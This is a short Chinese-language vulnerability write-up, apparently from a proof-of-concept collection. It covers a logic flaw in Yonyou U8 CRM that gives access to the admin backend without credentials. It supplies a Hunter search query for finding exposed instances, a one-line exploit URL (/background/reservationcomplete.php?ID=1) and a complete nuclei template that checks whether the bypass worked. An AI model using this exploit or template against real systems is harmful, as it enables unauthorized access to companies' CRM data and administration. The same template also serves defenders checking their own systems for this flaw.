用友CRM系统存在逻辑漏洞直接登录后台

用友CRM系统存在逻辑漏洞直接登录后台

鹰图

1
app.name="用友 CRM"

poc

1
/background/reservationcomplete.php?ID=1

访问poc,页面返回空白
image

直接就访问主要就登录后台了
image

image

nuclei

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
id: yongyouU8_CRM-reservationcomplete
info:
  name: 用友CRM系统存在逻辑漏洞直接登录后台
  author: wy876
  severity: high

http:
  - raw:
      - |
        GET /background/reservationcomplete.php?ID=1 HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

        

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2,"\"msg\": \"bgsesstimeout-\", \"serverName\"")'